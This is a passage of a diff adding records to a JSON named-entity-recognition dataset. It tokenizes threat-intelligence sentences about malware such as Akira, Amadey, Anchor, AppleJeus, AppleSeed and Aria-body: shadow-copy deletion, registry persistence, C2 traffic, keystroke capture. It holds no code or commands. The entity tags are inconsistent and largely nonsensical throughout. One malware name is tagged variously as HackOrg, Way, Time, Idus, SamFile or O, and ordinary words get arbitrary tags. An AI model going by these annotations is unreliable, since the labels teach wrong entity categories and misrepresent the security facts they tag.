"a", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "encrypts", + "victim", + "filesystems", + "for", + "financial", + "extortion", + "purposes." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Akira", + "examines", + "files", + "prior", + "to", + "encryption", + "to", + "determine", + "if", + "they", + "meet", + "requirements", + "for", + "encryption", + "and", + "can", + "be", + "encrypted", + "by", + "the", + "ransomware.", + "These", + "checks", + "are", + "performed", + "through", + "native", + "Windows", + "functions", + "such", + "as", + "<code>GetFileAttributesW</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "will", + "delete", + "system", + "volume", + "shadow", + "copies", + "via", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Akira", + "executes", + "native", + "Windows", + "functions", + "such", + "as", + "<code>GetFileAttributesW</code>", + "and", + "`GetSystemInfo`." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "can", + "identify", + "remote", + "file", + "shares", + "for", + "encryption." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "will", + "execute", + "PowerShell", + "commands", + "to", + "delete", + "system", + "volume", + "shadow", + "copies." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "verifies", + "the", + "deletion", + "of", + "volume", + "shadow", + "copies", + "by", + "checking", + "for", + "the", + "existence", + "of", + "the", + "process", + "ID", + "related", + "to", + "the", + "process", + "created", + "to", + "delete", + "these", + "items." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "uses", + "the", + "<code>GetSystemInfo</code>", + "Windows", + "function", + "to", + "determine", + "the", + "number", + "of", + "processors", + "on", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "executes", + "from", + "the", + "Windows", + "command", + "line", + "and", + "can", + "take", + "various", + "arguments", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Akira", + "will", + "leverage", + "COM", + "objects", + "accessed", + "through", + "WMI", + "during", + "execution", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "can", + "collect", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "decoded", + "antivirus", + "name", + "strings." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "sent", + "victim", + "data", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "used", + "fast", + "flux", + "DNS", + "for", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "searched", + "for", + "folders", + "associated", + "with", + "antivirus", + "software." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "can", + "download", + "and", + "execute", + "files", + "to", + "further", + "infect", + "a", + "host", + "machine", + "with", + "additional", + "malware." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "modified", + "the", + "`:Zone.Identifier`", + "in", + "the", + "ADS", + "area", + "to", + "zero." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "overwritten", + "registry", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "used", + "a", + "variety", + "of", + "Windows", + "API", + "calls,", + "including", + "`GetComputerNameA`,", + "`GetUserNameA`,", + "and", + "`CreateProcessA`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "obfuscated", + "strings", + "such", + "as", + "antivirus", + "vendor", + "names,", + "domains,", + "files,", + "and", + "others." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "changed", + "the", + "Startup", + "folder", + "to", + "the", + "one", + "containing", + "its", + "executable", + "by", + "overwriting", + "the", + "registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "checked", + "for", + "a", + "variety", + "of", + "antivirus", + "products." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "collected", + "the", + "computer", + "name", + "and", + "OS", + "version", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "does", + "not", + "run", + "any", + "tasks", + "or", + "install", + "additional", + "malware", + "if", + "the", + "victim", + "machine", + "is", + "based", + "in", + "Russia." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "Amadey", + "can", + "identify", + "the", + "IP", + "address", + "of", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "collected", + "the", + "user", + "name", + "from", + "a", + "compromised", + "host", + "using", + "`GetUserNameA`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Amadey", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "been", + "signed", + "with", + "valid", + "certificates", + "to", + "evade", + "detection", + "by", + "security", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "install", + "itself", + "as", + "a", + "cron", + "job." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Variants", + "of", + "Anchor", + "can", + "use", + "DNS", + "tunneling", + "to", + "communicate", + "with", + "C2." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "terminate", + "itself", + "if", + "specific", + "execution", + "flags", + "are", + "not", + "present." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "use", + "secondary", + "C2", + "servers", + "for", + "communication", + "after", + "establishing", + "connectivity", + "and", + "relaying", + "victim", + "information", + "to", + "primary", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "self", + "delete", + "its", + "dropper", + "after", + "the", + "malware", + "is", + "successfully", + "deployed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "download", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "used", + "NTFS", + "to", + "hide", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "used", + "ICMP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "obfuscated", + "code", + "with", + "stack", + "strings", + "and", + "string", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "support", + "windows", + "execution", + "via", + "SMB", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "create", + "a", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "create", + "and", + "execute", + "services", + "to", + "load", + "its", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "come", + "with", + "a", + "packed", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "determine", + "the", + "hostname", + "and", + "linux", + "version", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "determine", + "the", + "public", + "IP", + "and", + "location", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "execute", + "payloads", + "via", + "shell", + "scripting." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "has", + "used", + "cmd.exe", + "to", + "run", + "its", + "self", + "deletion", + "routine." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Anchor", + "can", + "establish", + "persistence", + "by", + "creating", + "a", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "presented", + "the", + "user", + "with", + "a", + "UAC", + "prompt", + "to", + "elevate", + "privileges", + "while", + "installing." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "used", + "a", + "valid", + "digital", + "signature", + "from", + "Sectigo", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "decoded", + "files", + "received", + "from", + "a", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "exfiltrated", + "collected", + "host", + "information", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "deleted", + "the", + "MSI", + "file", + "after", + "installation." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "added", + "a", + "leading", + "<code>.</code>", + "to", + "plist", + "filenames,", + "unlisting", + "them", + "from", + "the", + "Finder", + "app", + "and", + "default", + "Terminal", + "directory", + "listings." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "AppleJeus's", + "installation", + "process,", + "it", + "uses", + "`postinstall`", + "scripts", + "to", + "extract", + "a", + "hidden", + "plist", + "from", + "the", + "application's", + "`/Resources`", + "folder", + "and", + "execute", + "the", + "`plist`", + "file", + "as", + "a", + "Launch", + "Daemon", + "with", + "elevated", + "permissions." + ], + "ner_tags": [ + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "placed", + "a", + "plist", + "file", + "within", + "the", + "<code>LaunchDaemons</code>", + "folder", + "and", + "launched", + "it", + "manually." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "loaded", + "a", + "plist", + "file", + "using", + "the", + "<code>launchctl</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "required", + "user", + "execution", + "of", + "a", + "malicious", + "MSI", + "installer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus's", + "spearphishing", + "links", + "required", + "user", + "interaction", + "to", + "navigate", + "to", + "the", + "malicious", + "website." + ], + "ner_tags": [ + "B-SecTeam", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "been", + "installed", + "via", + "MSI", + "installer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "XOR-encrypted", + "collected", + "system", + "information", + "prior", + "to", + "sending", + "to", + "a", + "C2.", + "AppleJeus", + "has", + "also", + "used", + "the", + "open", + "source", + "ADVObfuscation", + "library", + "for", + "its", + "components." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "created", + "a", + "scheduled", + "SYSTEM", + "task", + "that", + "runs", + "when", + "a", + "user", + "logs", + "in." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "been", + "distributed", + "via", + "spearphishing", + "link." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "collected", + "the", + "victim", + "host", + "information", + "after", + "infection." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "waited", + "a", + "specified", + "time", + "before", + "downloading", + "a", + "second", + "stage", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "used", + "shell", + "scripts", + "to", + "execute", + "commands", + "after", + "installation", + "and", + "set", + "persistence", + "mechanisms." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "has", + "sent", + "data", + "to", + "its", + "C2", + "server", + "via", + "<code>POST</code>", + "requests." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleJeus", + "can", + "install", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "gain", + "system", + "level", + "privilege", + "by", + "passing", + "<code>SeDebugPrivilege</code>", + "to", + "the", + "<code>AdjustTokenPrivilege</code>", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "compressed", + "collected", + "data", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "zip", + "and", + "encrypt", + "data", + "collected", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "B-HackOrg", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "automatically", + "collected", + "data", + "from", + "USB", + "drives,", + "keystrokes,", + "and", + "screen", + "images", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "divided", + "files", + "if", + "the", + "size", + "is", + "0x1000000", + "bytes", + "or", + "more." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "collect", + "data", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "find", + "and", + "collect", + "data", + "from", + "removable", + "media", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "decode", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "exfiltrate", + "files", + "via", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "exfiltrated", + "files", + "using", + "web", + "services." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "use", + "a", + "second", + "channel", + "for", + "C2", + "when", + "the", + "primary", + "channel", + "is", + "in", + "upload", + "mode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "delete", + "files", + "from", + "a", + "compromised", + "host", + "after", + "they", + "are", + "exfiltrated." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "search", + "for", + ".txt,", + ".ppt,", + ".hwp,", + ".pdf,", + "and", + ".doc", + "files", + "in", + "specified", + "directories." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "use", + "JavaScript", + "to", + "execute", + "PowerShell." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "use", + "<code>GetKeyState</code>", + "and", + "<code>GetKeyboardState</code>", + "to", + "capture", + "keystrokes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "stage", + "files", + "in", + "a", + "central", + "location", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "achieve", + "execution", + "through", + "users", + "running", + "malicious", + "file", + "attachments", + "distributed", + "via", + "email." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "disguise", + "JavaScript", + "files", + "as", + "PDFs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "rename", + "its", + "payload", + "to", + "ESTCommon.dll", + "to", + "masquerade", + "as", + "a", + "DLL", + "belonging", + "to", + "ESTsecurity." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "use", + "multiple", + "dynamically", + "resolved", + "API", + "calls." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "Base64", + "encode", + "its", + "payload", + "and", + "custom", + "encrypt", + "API", + "calls." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "execute", + "its", + "payload", + "via", + "PowerShell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "enumerate", + "the", + "current", + "process", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "create", + "the", + "Registry", + "key", + "name", + "<code>EstsoftAutoUpdate</code>", + "at", + "<code>HKCU\\Software\\Microsoft/Windows\\CurrentVersion\\RunOnce</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "call", + "regsvr32.exe", + "for", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "take", + "screenshots", + "on", + "a", + "compromised", + "host", + "by", + "calling", + "a", + "series", + "of", + "APIs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "used", + "UPX", + "packers", + "for", + "its", + "payload", + "DLL." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "been", + "distributed", + "to", + "victims", + "through", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "identify", + "the", + "OS", + "version", + "of", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "identify", + "the", + "IP", + "of", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "can", + "pull", + "a", + "timestamp", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AppleSeed", + "has", + "the", + "ability", + "to", + "communicate", + "with", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "identify", + "the", + "titles", + "of", + "running", + "windows", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "used", + "ZIP", + "to", + "compress", + "data", + "gathered", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "execute", + "a", + "process", + "using", + "<code>runas</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "collect", + "data", + "from", + "USB", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "decrypt", + "the", + "loader", + "configuration", + "and", + "payload", + "DLL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Aria-body", + "has", + "the", + "ability", + "to", + "use", + "a", + "DGA", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + 